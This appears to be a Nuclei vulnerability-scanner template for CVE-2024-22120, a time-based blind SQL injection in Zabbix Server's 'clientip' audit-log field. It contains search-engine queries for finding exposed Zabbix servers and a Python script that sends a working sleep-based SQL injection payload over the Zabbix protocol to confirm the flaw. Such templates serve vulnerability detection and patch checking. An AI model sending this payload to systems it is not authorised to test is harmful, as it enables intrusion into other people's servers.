74 lines
2.7 KiB
YAML
74 lines
2.7 KiB
YAML
id: CVE-2024-22120
|
|
|
|
info:
|
|
name: Zabbix Server - Time-Based Blind SQL injection
|
|
author: CodeStuffBreakThings
|
|
severity: critical
|
|
description: |
|
|
The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
|
|
remediation: |
|
|
Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
|
|
reference:
|
|
- https://support.zabbix.com/browse/ZBX-24505#/
|
|
- https://github.com/W01fh4cker/CVE-2024-22120-RCE
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-22120
|
|
- https://support.zabbix.com/browse/ZBX-24505
|
|
- https://github.com/AboSteam/POPC
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2024-22120
|
|
cwe-id: CWE-20
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09568
|
|
metadata:
|
|
max-request: 1
|
|
vendor: zabbix
|
|
product: zabbix
|
|
shodan-query:
|
|
- http.title:"zabbix-server"
|
|
- cpe:"cpe:2.3:a:zabbix:zabbix"
|
|
- http.favicon.hash:"892542951"
|
|
fofa-query:
|
|
- icon_hash=892542951
|
|
- app="zabbix-监控系统" && body="saml"
|
|
- title="zabbix-server"
|
|
google-query: intitle:"zabbix-server"
|
|
tags: cve,cve2024,authenticated,zabbix,sqli
|
|
variables:
|
|
HOST: "{{Host}}"
|
|
PORT: "{{Port}}"
|
|
SID: "{{SID}}"
|
|
HOSTID: "{{HOSTID}}"
|
|
|
|
code:
|
|
- engine:
|
|
- py
|
|
- python3
|
|
source: |
|
|
import os, struct, socket
|
|
from datetime import datetime
|
|
hostname=os.getenv('HOST')
|
|
port=int(os.getenv('PORT'))
|
|
sid=os.getenv('SID')
|
|
hostid=os.getenv('HOSTID')
|
|
zbx_header = "ZBXD\x01".encode()
|
|
message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
|
|
message_length = struct.pack('<q', len(message_json))
|
|
message = zbx_header + message_length + message_json.encode()
|
|
before_query = datetime.now().timestamp()
|
|
s = socket.socket()
|
|
s.connect((hostname,port))
|
|
s.send(message)
|
|
response = s.recv(1024)
|
|
s.close()
|
|
after_query = datetime.now().timestamp()
|
|
responsetime = after_query - before_query
|
|
if responsetime >= 10 and zbx_header in response:
|
|
print("Vulnerable to CVE-2024-22120")
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Vulnerable to CVE-2024-22120"
|
|
# digest: 4a0a00473045022100d6eade8e599069ba5f94de261357dce41150496111312f3c27dd0f4bea5371ef0220244fbe4ba8eca7787fde62c8569d98ee2ddb2aeb614527b154ae892f1f002abc:922c64590222798bb761d5b6d8e72950 |